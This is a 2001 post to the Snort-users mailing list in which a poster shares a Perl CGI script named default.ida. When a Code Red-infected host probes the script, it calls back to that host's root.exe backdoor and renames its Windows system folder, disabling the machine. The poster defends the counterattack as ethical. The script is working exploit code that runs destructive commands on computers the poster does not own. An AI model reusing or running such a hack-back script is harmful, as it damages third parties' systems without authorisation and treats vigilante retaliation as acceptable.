[Snort-users] Code Red attacks

F.M. Taylor root at ...28...
Tue Sep 18 07:50:06 EDT 2001

This is a "default.ida" script that I am using on a server somewhere.  It
seems to be working, at least some of the time.

Ethical??  Well, it is a script, on a server that I own, and the only way
it will do anything is if you try to access it.  It doesn't activly look
for anything, it just waits for a service request, and then performs the
requested service.  If you don't want this service, don't request it.

If there is a better way to deliver this service after it has been
requested (more elegant code), let me know. 

root at ...2642...:/htdocs# cat default.ida

$ipAddress = $ENV{'REMOTE_ADDR'};
$newUrl = $ipAddress."/scripts/root.exe?ren+c:\\winnt+c:\\codered\";
system("TERM=vt100;export TERM;lynx \'http://$ipAddress/scripts/root.exe?ren+c:\\winnt+c:\\codered\' >>codered.txt");
print "Content-type: text/html\n\n";
print "<HTML><HEAD>";
print "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;url=http://$newUrl\">";
print "</HEAD><BODY></BODY>";
print "</HTML>";

More information about the Snort-users mailing list